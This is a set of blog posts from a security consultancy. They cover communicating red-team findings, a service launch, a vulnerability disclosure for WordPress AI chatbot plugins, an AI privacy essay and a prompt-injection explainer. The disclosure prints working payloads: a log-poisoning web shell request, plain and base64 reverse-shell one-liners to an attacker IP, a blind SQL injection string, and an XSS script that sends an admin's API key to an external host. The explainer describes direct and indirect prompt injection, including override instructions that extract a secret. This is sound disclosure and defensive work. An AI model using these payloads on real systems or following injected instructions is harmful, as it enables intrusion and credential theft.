  3. Retention: People are more likely to remember concepts presented through relatable stories or comparisons.
  4. Decision Making: Clear understanding facilitates better and faster decision-making processes.

Translating Technical Risks through Effective Analogies

When crafting an analogy from technical risks we need to think carefully about what message we want our audience to take away from it. Analogies do not need to be long to have impact – one of the most effective analogies I have seen used to explain how poor the security of a system was from a security test was summed up as:

“This test was like big game hunting in a zoo.”

While blunt, it did server as a useful strapline to set the tone that the test identified numerous big issues which required little to no skill to uncover or abuse.

Building on such a strapline though is necessary, as this alone does not help the business understand the impact of the test or understand the underlying issues. Therefore we need to get a little bit more creative. Here are some examples of what we could do to build on this concept.

Example 1: Vulnerability Exploitation

Technical Description: The red team discovered a critical vulnerability in a company’s web application that allows unauthorised access to sensitive customer data.

Analogy: “Think of our web application as a shop in the town that is your company. This shop has a hidden backdoor that is not locked. Right now, anyone who knows about this door can walk right in and access the till, help themselves to stock, and look at the customer list. We need to secure this backdoor immediately to protect our customers and maintain their trust.”

Business Impact Translation:

  • Financial Risk: Potential fines from regulatory bodies due to data breaches.
  • Reputation Risk: Loss of customer trust leading to decreased sales and market share.
  • Operational Risk: Disruption of services and increased costs associated with incident response and remediation.

Example 2: Insufficient Incident Response Plan

Technical Description: The organisation’s incident response plan lacks clear procedures and is not regularly tested, leading to potential delays in addressing security breaches.

Analogy: “Imagine our company’s security like a fire drill that no one has practiced. If a fire breaks out, chaos ensues because people are not sure where to go or what to do, leading to greater damage and panic. Regularly practicing and updating our incident response plan ensures that we can act swiftly and effectively when a security ‘fire’ occurs.”

Business Impact Translation:

  • Extended Downtime: Slow response increases recovery time, affecting productivity and revenue.
  • Increased Damage: Delays allow threats to cause more extensive harm to systems and data.
  • Regulatory Consequences: Inefficient response may not meet compliance requirements, resulting in penalties.

Example 3: Lack of Employee Security Awareness

Technical Description: Employees are not adequately trained in security best practices, making them susceptible to phishing attacks and social engineering.

Analogy: “Our employees are like the guards of our castle, but without proper training, they might unknowingly open the gates to enemies disguised as friends. Providing comprehensive security training, and sufficient tools equip them with the knowledge and capabilities to recognise and block these disguised threats, keeping our ‘castle’ safe.”

Business Impact Translation:

  • Data Breaches: Increased likelihood of sensitive information being compromised.
  • Financial Losses: Costs associated with breach mitigation and potential fraud.
  • Brand Damage: Publicised security incidents can harm the company’s reputation and customer confidence.

Example 4: Misconfigured Identity and Access Management Systems

Technical Description: The red team identified that a server which had been delegated authority to access and change records in an Active Directory making them susceptible to take over by threat actors.

Analogy: “Think of this server like a shop in the town that is your company. At the back of the shop is an unlocked door which opens our into the town hall records department. The shopkeeper or any threat actor who breaks into the shop can use the backdoor to not only look at the town hall records of every citizen of the town, but also the records of every shop and house within the town and can change those records to make it look like they live or own that instead. We need to demolish this backdoor, review the town hall, and audit the town records to check no one has abused this and that other backdoors do not exist.”

Business Impact Translation:

  • Financial Risk: Potential fines from regulatory bodies due to data breaches.
  • Brand Damage: Publicised security incidents can harm the company’s reputation and customer confidence.
  • Operational Risk: Disruption of services and increased costs associated with incident response and remediation.
  • Data Breaches: Increased likelihood of sensitive information being compromised.

Conclusion

Red teaming is an essential practice for proactively identifying and mitigating technical risks within an organisation.

However, the true value of these exercises is realised only when the findings are effectively communicated to business leaders in a language they understand.

Utilising analogies and clear, impactful messaging bridges the gap between technical complexity and business comprehension, enabling organizations to make informed decisions that strengthen their security posture and resilience. By investing in effective communication strategies, organisations not only enhance their ability to respond to current threats but also foster a culture of security awareness and proactive risk management that is critical in today’s digital age.

Email Prism Infosec, complete our Contact Us form or call us on 01242 652100 and ask for Sales to setup an initial discussion.

Prism Infosec launches PULSE agile red team engagement service

Prism Infosec, the independent cybersecurity consultancy, has announced the launch of its innovative PULSE testing service to enable organisations which may not have the bandwidth or resource to dedicate to a full-scale red team exercise to assess their defence capabilities against real-world threats. PULSE addresses the gap that currently exists between penetration testing and red teaming which can prevent organisations from gaining an accurate understanding of their security posture and provides an agile alternative that utilises an intensive testing approach.

Penetration Tests are contained evaluations that assess security boundaries and controls of distinct systems that excel at the analysis of specific vulnerabilities contained to specific control planes of individual systems. In contrast, red teaming is a real-world test of the organisation’s defences against threat actor activities and capabilities which sees the tester adopt a more opportunistic approach that more closely mirrors the attacks the business could expect to be subjected to. PULSE has been devised to bridge the gap between the two different approaches using threat actor simulation.

PULSE evaluates the security of an organisation’s perimeter, endpoint security, and environment, from the point of view of a time-limited opportunistic threat actor. Conducted over five days using techniques aligned with the MITRE ATT&CK framework, tests are carried out that are flexible, repeatable and measurable. Suitable for organisations that have invested in security tooling but lack a full-time dedicated Security Operations Centre (SOC) and staff, the timeframe and methods used ensure PULSE tests are not disruptive while still subjecting systems to rigorous assault.

“Red Teaming is a fantastic tool for exercising security tooling, staff, policies, and procedures in a realistic, secure, and safe manner. It does this by taking the Tactics, Techniques and Procedures (TTPs) of genuine cyber threat actors and applies them in intelligence led scenarios which can span multiple weeks. However, not every organisation is ready for the cost, time, and effort that a full red team engagement requires to deliver value for the business,” explains David Viola, Head of Red Team at Prism Infosec.

“It’s here where PULSE comes in, allowing the organisation to real-world test its systems but without the commitment or disruption associated with red teaming. The PULSE tests emulate the approach an opportunistic cyber threat actor would take when seeking to breach the perimeter, establish a foothold, and compromise the environment all within the space of a working week.”

The PULSE methodology is designed to rapidly test multiple different payloads and delivery mechanisms similar in approach to purple teaming which combines offensive and defensive tactics and involves the following steps:

Scoping – Red Team consultants capture the information needed for a successful engagement.
PULSE Test Plan – A tailored test plan is devised based upon the PULSE methodology and the findings from the scoping questionnaire.
PULSE Preparation – The client provides the pre-requisites while the consultant prepares payloads, infrastructure, and tooling.
PULSE Perimeter Assessment – Testing begins with an assessment of the perimeter using different payload delivery techniques.
PULSE Attack Surface Assessment – Successful payloads are tested against installed security solutions to establish which trigger an alert, which ones are blocked, and which penetrate the business.
PULSE Environment Assessment – Using a successful payload, an assessment is made of how far a threat actor would be able to penetrate the environment.
PULSE Report – The outcomes of all three phases are then documented, along with recommendations to harden the environment and suggestions and advice for follow-up testing to improve security posture.

PULSE can also be customised to enable testing specific to the customer environment, such as through the addition of physical testing using social engineering and physical breach techniques.

Phil Robinson, CEO at Prism Infosec, adds: “Our commitment to advancing our technical capabilities has led us to create a service that effectively bridges the gap between Penetration Testing and Red Teaming. With PULSE, we’re making this high level of technical expertise accessible to organisations of all sizes. I’m thrilled to introduce PULSE to our clients and look forward to seeing the impact it will have on their security posture.”

PULSE is the first agile red team service Prism Infosec is announcing as part of a strategic reinvigoration of its red team service offerings. Future plans include a redefined Purple Teaming service and an integrated IR and Red Team service.

More information on PULSE can be found here.

WordPress Plugins: AI-dentifying Chatbot Weak Spots

AI chatbots have become increasingly prevalent across various industries due to their ability to simulate human-like conversations and perform a range of tasks. This trend is evident in the WordPress ecosystem, where AI chatbot plugins are becoming widely adopted to enhance website functionality and user engagement.

Prism Infosec reviewed the security postures of several open-source WordPress AI Chatbot plugins and identified various issues exploitable from both a high-privilege and unauthenticated perspective.

This post highlights the discovery of four specific Common Vulnerabilities and Exposures (CVEs) within these plugins:

CVE-2024-6451 – AI Engine < 2.5.1 – Admin+ RCE

WPScan: https://wpscan.com/vulnerability/fc06d413-a227-470c-a5b7-cdab57aeab34/

AI Engine < 2.5.1 is susceptible to remote-code-execution (RCE) via Log Poisoning. The plugin fails to validate the file extension of “logs_path”, allowing Administrators to change log filetypes from .log to .php.

Error messages can then be manipulated to contain arbitrary PHP with the intent to have this echoed in the log file and ultimately executed as legitimate code by the web server, leading to the potential for remote-code-execution.”

At the time of exploitation, the AI Engine version assessed was v2.4.3 – with 2.6m downloads and 70k active installations:

The attack unfolded by enabling Dev Tools via “Settings > Advanced > Enable Dev Tools”.

Within the “Dev Tools” Tab, the “Server Debug” option was enabled to allow for error logging – a pre-requisite for the earlier mentioned Log Poisoning attack.

As part of such attack, a malicious actor attempts to inject specially crafted payloads into log files that exploit vulnerabilities in the log processing or parsing mechanisms.

If these payloads are later executed by the system, webserver or unsafely interpreted by a vulnerable application, they may lead to RCE.


Whilst modifying plugin configurations, it was observed that “logs_path” was user-controllable and could be manipulated with an alternative extension (such as .php).

Navigating to the URL disclosed in “logs_path” presented an array of payloads what were echoed in the log during testing – however, these were benign as the .log extension rendered all payloads to be interpreted as plain text.


The error log extension was subsequently set as .php with the intent to cause the webserver to interpret any PHP payloads within the log as legitimate server-side code:

Request:
POST /wp-json/mwai/v1/settings/update HTTP/1.1
Host: 192.168.178.143
Content-Length: 17702
Pragma: no-cache
Cache-Control: no-cache
X-WP-Nonce: 54c6dd2c07
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://192.168.178.143
Referer: http://192.168.178.143/wp-admin/admin.php?page=mwai_settings&nekoTab=settings
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: keep-alive

{
  "options": {
    "embeddings_default_env": "lohkmfon",
    "ai_default_env": "zl9pvc1h",
    "module_suggestions": true,
    "module_chatbots": true,
    -- SNIP --
    },
    "public_api": true,
    "debug_mode": false,
    "server_debug_mode": true,
    "logs_path": "/opt/bitnami/wordpress/wp-content/uploads/webshell.php"
  }
}

Response:
HTTP/1.1 200 OK
Date: Tue, 18 Jun 2024 09:59:48 GMT

-- SNIP --

{
  "success": true,
  "message": "OK",
  "options": {
    "embeddings_default_env": "lohkmfon",
    -- SNIP –-
    "public_api": true,
    "debug_mode": false,
    "server_debug_mode": true,
    "logs_path": "/opt/bitnami/wordpress/wp-content/uploads/webshell.php",
    "intro_message": true
  }
}


Once the log file was modified to be served as PHP, the next step was to identify an entry field which fully reflected the attacker’s input within the log. In this case, “Organization ID” was found to be fit for purpose:


The payload could then be planted within the log by navigating to the chatbot and submitting a message – which in turn invoked an error:


This echoed the PHP payload within the Admin Logs panel as benign text:

However, the log file itself (which now served as a web shell) could be leveraged to execute system commands on the underlying server:


Once remote-code-execution was confirmed to be possible, the below payload was devised to instruct the remote server to establish a reverse shell connection with the attacker’s IP address and port number (in this case, 192.168.1.93 on port 80). This would effectively allow remote access into the target machine:

Reverse Shell:

sh -i >& /dev/tcp/192.168.1.93/80 0>&1

The above payload did not yield a reverse shell connection and was therefore revised to undergo “base64” decoding with the result piped into “bash“:

Reverse Shell (Base64 Encoded):

echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjkzLzgwIDA+JjE= | base64 -d | bash

As pictured below, a reverse-shell connection was successfully established and remote access into the system was achieved:


The finding was disclosed on WPScan and addressed in version 2.4.8, with further improvements made in version 2.5.1. Big thank you to plugin author Jordy Meow for swiftly fixing the raised vulnerabilities.

CVE-2024-6723 – AI Engine < 2.4.8 – Admin+ SQL Injection

Further testing of the AI Engine plugin had identified an SQL injection vulnerability within one of the admin functionalities. At the time of writing, WPScan has verified the issue and assigned a CVE ID – however, has not publicly released the finding.

As such, technical details have been omitted from this write-up, but it is understood that the issue was addressed in version 2.4.8:


Whilst it is acknowledged that the vulnerabilities affecting AI Engine required administrative access for successful exploitation and therefore the risks were slightly mitigated, the other assessed (and much less popular) AI chatbot plugin was found to be exploitable from a completely unauthenticated perspective.

CVE-2024-6847 – SmartSearch WP <= 2.4.4 – Unauthenticated SQLi

WPScan: https://wpscan.com/vulnerability/baa860bb-3b7d-438a-ad54-92bf8e21e851/

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users when submitting messages to the chatbot.”

At the time of exploitation, the SmartSearch WP version assessed was v2.4.2 – with less than 2k downloads and 10+ active installations (30+ at the time of writing):


Unauthenticated users had the ability to perform SQL injection attacks directly via the chatbot:

The below request was intercepted upon sending a message. Here, the SQL SLEEP() function was inserted into vulnerable parameter “unique_conversation”:

Request:
POST /wp-json/wdgpt/v1/retrieve-prompt HTTP/1.1
Host: 192.168.178.143
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://192.168.178.143
Referer: http://192.168.178.143/2024/06/17/hello-world/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: keep-alive

{
  "question": "Test",
  "conversation": [
    {
      "text": "Test",
      "role": "user",
      "date": "2024-06-21T12:16:42.179Z"
    }
  ],
  "unique_conversation": "mlg4w8is9cnlxonnq78' AND (SELECT 1 FROM (SELECT SLEEP(25))A) AND '1'='1"
}


A response was received after the amount of time specified in the payload (+3s for processing delay), thereby confirming the presence of a blind SQL injection vulnerability:

It was then possible to use “SQLMap” to automate the time-based process of exfiltrating the database:

The finding was disclosed on WPScan and addressed in version 2.4.5.

CVE-2024-6843 – SmartSearch WP <= 2.4.4 – Unauthenticated Stored XSS

WPScan: https://wpscan.com/vulnerability/9a5cb440-065a-445a-9a09-55bd5f782e85/

“The plugin does not sanitise and escape chatbot conversations, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks within the Admin ‘Chat Logs’ panel even when the unfiltered_html capability is disallowed (for example in multisite setup).”

During testing, the chatbot was observed to be susceptible to Self-XSS – a type of an injection attack whereby payloads cannot propagate to other users, and are typically executed only in application areas accessible to the person who submitted the payload.

Highlighted below, the payload “<img src=x onerror=alert(10)>” was submitted and immediately the JavaScript alert was executed:

Whilst the impact of self-XSS can be considered negligible, it was observed that the payloads were also successfully stored within the administrative “Chat Logs” area – potentially allowing an attacker to populate chatbot conversations with malicious payloads, to be later executed against a viewing administrator.

Once it was confirmed that JS execution on the admin panel was possible, the below payload was devised to steal the ChatGPT API key from “Settings” and forward it to an attacker-controlled domain:

API Key Hijack Payload:
fetch(‘http://192.168.178.143/wp-admin/admin.php?page=wdgpt’, {
    credentials: ‘include’
}).then(response => response.text()).then(text => new DOMParser().parseFromString(text, ‘text/html’)).then(doc => {
    const key = doc.querySelector(‘#wd_openai_api_key_field’).value;
    fetch(`https://jtgyf4on6gofakn7d59eq33rsiy9m0co1.oastify.com/stolen_gpt_key=${key}`);
});

The above payload was Base64 encoded and passed to eval() for execution:

API Key Hijack Payload (Base64 Encoded):
<script>eval(atob(‘ZmV0Y2goJ2h0dHA6Ly8xOTIuMTY4LjE3OC4xNDMvd3AtYWRtaW4vYWRtaW4ucGhwP3BhZ2U9d2RncHQnLCB7IGNyZWRlbnRpYWxzOiAnaW5jbHVkZScgfSkudGhlbihyZXNwb25zZSA9PiByZXNwb25zZS50ZXh0KCkpLnRoZW4odGV4dCA9PiBuZXcgRE9NUGFyc2VyKCkucGFyc2VGcm9tU3RyaW5nKHRleHQsICd0ZXh0L2h0bWwnKSkudGhlbihkb2MgPT4geyBjb25zdCBrZXkgPSBkb2MucXVlcnlTZWxlY3RvcignI3dkX29wZW5haV9hcGlfa2V5X2ZpZWxkJykudmFsdWU7IGZldGNoKGBodHRwczovL2p0Z3lmNG9uNmdvZmFrbjdkNTllcTMzcnNpeTltMGNvMS5vYXN0aWZ5LmNvbS9zdG9sZW5fZ3B0X2tleT0ke2tleX1gKTsgfSk7’))></script>


The constructed payload could then be submitted as a message, in the hope that an administrator would later view conversation logs and have the XSS payload executed within their web-browser, in the context of their user session:


As highlighted below, the payload was successfully executed against the viewing administrator and the ChatGPT API key was intercepted by the attacker-controlled server:


The finding was disclosed on WPScan and addressed in version 2.4.5. Prism Infosec would like to thank the WPScan team for seamlessly handling the disclosure process of all discussed vulnerabilities.

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing

All Vulnerabilities were discovered and written by Karolis Narvilas of Prism Infosec.

The Dark side of AI Part 2: Big brother  

AI: Data source or data sink?

The idea of artificial intelligence is not a new one. For decades, people have been finding ways to emulate the pliable nature of the human brain, with machine learning being mankind’s latest attempt. Artificial intelligence models are expected to be learn how to form appropriate responses to given set of inputs. With each “incorrect” response, the AI’s codebase would iteratively modify its response until a “correct” response is reached without further outside intervention.

To achieve this, the model would be fed with vast amounts of training data, which would typically include the interactions of end-users themselves. With well-known AI models found within ChatGPT and Llama, they would be made available to a large population. That’s a lot of input to capture by a select few entities, and that would have to have been stored [1] somewhere before being fed.

And that is a lot of responsibility for the data holders to make sure that it doesn’t fall into the wrong hands. In fact, in March 2023 [2] OpenAI stated that it will no longer be using customer input as training data for their own ChatGPT model; incidentally, in a later report in July 2024, OpenAI remarked that they had suffered a data breach in early 2023 [3]. Though they claim no customer/partner information had been accessed, at this point we only have their word to go by.

AI Companies are like any other tech company – they still must store and process data, and with this they still have the same sets of targets above their head.

The nature of nurturing AI

As with a child learning from a parent, an AI model would begin to learn from the data it is fed and may begin to spot trends in the datasets. These trends would then manifest in the form of opinions- whereby the AI would attempt to provide a response that it thinks would satisfy the user.

Putting it another way, companies would be able to leverage AI to understand preferences [4] of each user and aim to serve content or services that would closely match their tastes, arguably to a finer level of detail than traditional approaches. User data is too valuable an asset for companies and hackers alike to pass up, and it is no secret that everyone using AI would have a unique profile tailored to them.

Surpassing the creator?

It’s also no secret that in one form or another, these profiles can also be used to influence big decisions. For instance, AI is being increasingly used to aid [5] medical professionals in analysing ultrasound measurements and predicting chronic illnesses such as cardiovascular diseases. The time saved in making decisions is would literally be a matter of life and death.

However, this can be turned on its head if it is used as crutch [6] rather than as an aid. Imagine a scenario where a company is looking to hire and decides to leverage an AI to profile all candidates before an interview. For it to work, the candidate must submit some basic personal information, to which the AI would then scour the internet to look for other pieces of data pertaining to the individual. With potentially hundreds of candidates to choose from, the recruiter may lean upon the services of the AI and base their choice on its decision. Logically speaking, this would be a wise decision, as a recruiter would not want to hire someone who is qualified but has a questionable work ethic or has past history of being a liability.

While this would effectively automate the same processes that a recruiter would do themselves, it would be disheartening for the candidate to be rejected an interview on the basis of their background profile that the AI has created of them which may not be fully accurate, even if they meet the job requirements. Conversely, another candidate may be hired due to a more favourable background profile, but in reality they are underqualified to do the job; in both cases this would not be a true representation of the candidates.

Today, AI is not yet mature enough to discern what is true of a person and what is not- it sees data for what it is and acts upon it regardless. All the while, the AI would continue to violate the privacy of the user and build an imperfect profile which could potentially impact their lives for better or worse.

Final conclusions

As with all things, if there is no price for the product, then the user is the product. With AI, even if users are charged a price, whatever companies say otherwise they will become part of the product one way or another. For many users, they choose to accept so long as big tech keep their word on keeping their information safe and secure. But one should ask; safe and secure from whom?

References

This post was written by Leon Yu.

Exploring Chat Injection Attacks in AI Systems

Introduction to AI Chat Systems

What are they?

AI powered chat systems, often referred to as chatbots or conversational AI, are computer programs that are designed to simulate human conversation and interaction using artificial intelligence (AI). They can understand and respond to text or voice input from users and it make it seem like you are just talking to another person. They can handle a variety of tasks from answering questions and providing information to offering support or even chatting casually to the end user.

Since the release of OpenAI’s ChatGPT towards the end of 2022, you have probably seen a huge increase in these types of systems being used by businesses. They are used on platforms such as online retail websites or banking apps, where they can assist with placing orders, answering account questions, or help with troubleshooting. They can also perform a huge variety of more complex tasks to such as integrating with calendars and scheduling appointments, responding to emails, or even writing code for you (brilliant we know!). As you can imagine they are super powerful, have huge benefits to both businesses and consumers and will only get more intelligent as time goes on.

How do they work?

You may be wondering how they work, well it’s not a little robot sat at a desk typing on a keyboard and drinking coffee that’s for sure. AI chat systems use complex data sets, and something called natural language processing (NLP) to interpret your messages and then generate responses based on their understanding of the conversation’s context and their existing knowledge base. This allows them to communicate with you in a way that feels like you are talking to a real person, making interactions feel more natural and intuitive.

Here is a basic step by step workflow of how they work:

  1. A user initiates a chat by typing a message in the prompt or speaking to the chatbot.
  2. The chatbot then employs natural language processing (NLP) to examine the message, identifying words and phrases to gauge the user’s intent.
  3. It then looks through its library of responses to find the most relevant answer.
  4. A response is sent back to the user through the interface.
  5. The user can then continue the conversation and the cycle repeats until the chat concludes.

Natural language processing (NLP) is made up of multiple components which all work together to achieve the required results, some of these components include the following:

  • Natural Language Understanding (NLU): This part focuses on comprehending the intent behind the user’s input and identifying important entities such as names, locations, dates, or other key information.
  • Natural Language Generation (NLG): This component handles generating human like responses based on the input and context.
  • Machine Learning (ML): Chatbots often use machine learning algorithms to improve their performance over time. They can learn from user interactions and feedback to provide more accurate and relevant responses in the future.
  • Pre-built Knowledge Bases: Chat systems can be built with pre-existing knowledge bases that provide information on specific topics, services, or products. These can be enhanced with machine learning to offer more nuanced responses.
  • Context and State Management: AI chat systems keep track of the conversation’s context, allowing them to remember past interactions and tailor responses accordingly. This context awareness enables the chatbot to offer more personalised responses.
  • Integration with Backend Systems: AI chat systems can integrate with other software or databases to retrieve data or execute tasks, such as processing a payment or booking an appointment.
  • Training Data: Chatbots are often trained using large datasets of human conversation to learn language patterns and user intents. The more diverse and representative the data, the better the chatbot’s performance.
  • Deployment: Once built and trained, AI chat systems can be deployed on various platforms such as websites, messaging apps, or voice assistants to interact with users.

Chat Injection Attacks

Introduction to Chat Injection Attacks

AI chat systems can be a real game changer when it comes to getting things done efficiently, but it’s worth noting that they do come with some risks. In this section we are going to explore one of the main attack vectors that we see with AI chat systems, something called Chat Injection, also known as chatbot injection or prompt injection. This vulnerability is number one on the OWASP Top 10 list of vulnerabilities for LLMs 2023.

Chat injection is a security vulnerability that happens when an attacker tricks the chatbot’s conversation flow or large language model (LLM), making it do things it isn’t supposed to do. Attackers can therefore manipulate the behaviour to serve their own interests, compromising users, revealing sensitive information, influencing critical decisions, or bypassing safeguards that are in place. It’s similar to other versions of injection attacks such as SQL injection or command injection, where an attacker can target the user input to manipulate the system’s output in order to compromise the confidentiality, integrity or availability of systems and data.

There are two types of chat injection vulnerabilities, direct and indirect. Below we have detailed the differences between the two:

  • Direct Chat Injections: This is when an attacker exposes or alters the system prompt. This can let attackers take advantage of backend systems by accessing insecure functions and data stores linked to the language model. We often refer to this as ‘jailbreaking’.
  • Indirect Chat Injections: This is when a language model accepts input from external sources like websites, pdf documents or audio files that an attacker can control. The attacker can hide a prompt injection within this content, taking over the conversation’s context. This lets the attacker manipulate either the user or other systems the language model can access. Indirect prompt injections don’t have to be obvious to human users; if the language model processes the text, the attack can be carried out.

Chat Injection Methods

AI chat injection attacks can take various forms, depending on the techniques and vulnerabilities being exploited. Here are some of the common methods of AI chat injection:

  • Crafting Malicious Input: An attacker could create a direct prompt injection for the language model being used, telling it to disregard the system prompts set by the application’s creator. This allows the model to carry out instructions that might change the bot’s behaviour or manipulate the conversation flow.
  • Prompt Engineering: Attackers can use prompt engineering techniques to craft specific inputs designed to manipulate the chatbot’s responses. By subtly altering prompts, they can steer the conversation towards their goals.
  • Exploiting Context or State Management: Chatbots keep track of the conversation context to provide coherent responses. Attackers may exploit this context management by injecting misleading or harmful data, causing the bot to maintain a false state or context.
  • Manipulating Knowledge Bases or APIs: If a chatbot integrates with external data sources or APIs, attackers may attempt to manipulate these integrations by injecting specific inputs that trigger unwanted queries, data retrieval, or actions.
  • Phishing & Social Engineering: Attackers can manipulate the conversation to extract sensitive information from the chatbot or trick the chatbot into taking dangerous actions, such as visiting malicious websites or providing personal data.
  • Malicious Code Execution: In some cases, attackers may be able to inject code through the chatbot interface, which can lead to unintended execution of actions or commands.
  • Spamming or DOS Attacks: Attackers may use chatbots to send spam or malicious content to other users or overwhelm a system with excessive requests.
  • Input Data Manipulation: Attackers may provide inputs that exploit weaknesses in the chatbot’s data validation or sanitisation processes. This can lead to the bot behaving in unexpected ways or leaking information.

Below is an example of a chat injection attack which tricks the chatbot into disclosing a secret password which it should not disclose:

As you can see the way in which the message is phrased it confuses the chatbot into revealing the secret password.

Impact on Businesses & End Users

As you can see, AI chat injection attacks can pose significant risks to both businesses and end-users alike. For businesses, these types of attacks can lead to the chatbot performing unexpected actions, such as sharing incorrect information, exposing confidential data, or disrupting their services or processes. These issues can tarnish a company’s reputation and erode customer trust, as well as potentially lead to legal challenges. Therefore, it is important that businesses implement safeguarding techniques to reduce the risk of chat injection attacks happening and prevent any compromises of systems and data.

There are also various risks for end users too. Interacting with a compromised chatbot can result in falling victim to phishing scams, system compromises or disclosing personal information. An example would be the chatbot sending a malicious link to a user which when they click it, they could wither be presenting with a phishing page to harvest their credentials or bank details or it could be a web page to entice the user to download some malware to their system which could give the attacker remote access to their device. To mitigate these risks users should remain vigilant when engaging with AI chat systems.

Mitigating the Risks

It is important for both businesses consumers to reduce the likelihood of being a victim of a chat injection attack. Although in some cases it is difficult to prevent, there are some mitigations that can be put in to play which will help protect you. This last section of the blog will go through some of these protections.

The first mitigating step that chatbot developers can use is input validation and sanitising messages. These can minimise the impact of potentially malicious inputs.

Another mitigating tactic to use would be rate limiting, such as throttling user requests and implementing automated lockouts. This can also help deter rapid fire injection attempts or automated tools/scripts.

Regular testing of the AI models/chatbots as part of the development lifecycle can also help in protecting users and businesses as this will allow any vulnerabilities to be discovered and fixed prior to public release.

User authentication and verification along with IP and device monitoring can help deter anonymous online attackers as they would need to provide some sort of identification before using the service. The least privilege principle should be applied to ensure that the chatbot can only access what it needs to access. This will minimise the attack surface.

From a user’s perspective, you should be cautious when sharing sensitive information with chat bots to prevent data theft.

It would be a good idea to incorporate human oversight for critical operations to add a layer of validation which will act as a safeguard against unintended or potentially malicious actions.

Lastly, any systems that the chatbot integrates with should be secured to a good standard to minimise impact should there be a compromise.

Get Tested

If you are integrating or have already integrated AI or chatbots into your systems, reach out to us. Our comprehensive range of testing and assurance services will ensure your implementation is smooth and secure: https://prisminfosec.com/services/artificial-intelligence-ai-testing/

This post was written by Callum Morris